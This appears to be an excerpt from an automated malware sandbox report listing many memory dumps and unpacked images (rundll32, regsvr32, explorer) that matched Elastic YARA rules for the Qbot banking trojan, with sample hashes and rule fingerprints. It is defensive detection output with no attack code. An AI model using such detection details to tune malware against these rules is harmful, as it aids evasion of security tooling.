          Source: 00000012.00000002.399869043.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000014.00000000.386871374.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000014.00000000.386871374.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000002.00000003.374228221.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000002.00000003.374228221.0000000002CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000013.00000002.397766828.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000013.00000002.397766828.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: _Rsr.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          Source: 3.2.rundll32.exe.3100000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.2.rundll32.exe.3100000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 2.3.regsvr32.exe.2cce488.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 2.3.regsvr32.exe.2cce488.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 18.2.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 18.2.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 2.3.regsvr32.exe.2cce488.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 2.3.regsvr32.exe.2cce488.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 2.2.regsvr32.exe.27a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 2.2.regsvr32.exe.27a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 20.0.explorer.exe.26f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 20.0.explorer.exe.26f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.2.rundll32.exe.2eb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.2.rundll32.exe.2eb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 2.3.regsvr32.exe.2cce488.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 2.3.regsvr32.exe.2cce488.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.2.rundll32.exe.2eb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.2.rundll32.exe.2eb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 22.0.explorer.exe.2ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 22.0.explorer.exe.2ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 18.0.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 18.0.explorer.exe.2f80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 19.2.explorer.exe.2e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 19.2.explorer.exe.2e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 3.2.rundll32.exe.3100000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.2.rundll32.exe.3100000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 22.0.explorer.exe.2ed0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 22.0.explorer.exe.2ed0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 19.2.explorer.exe.2e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 19.2.explorer.exe.2e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 19.0.explorer.exe.2e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 19.0.explorer.exe.2e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 22.2.explorer.exe.2ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 22.2.explorer.exe.2ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 0.2.loaddll32.exe.a20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 0.2.loaddll32.exe.a20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 18.2.explorer.exe.2f80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 18.2.explorer.exe.2f80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 2.3.regsvr32.exe.2cce488.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 2.3.regsvr32.exe.2cce488.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 20.2.explorer.exe.26f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 20.2.explorer.exe.26f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 19.0.explorer.exe.2e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 19.0.explorer.exe.2e20000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 2.2.regsvr32.exe.27a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 2.2.regsvr32.exe.27a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 20.2.explorer.exe.26f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 20.2.explorer.exe.26f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 18.0.explorer.exe.2f80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 18.0.explorer.exe.2f80000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 20.0.explorer.exe.26f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 20.0.explorer.exe.26f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 22.2.explorer.exe.2ed0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
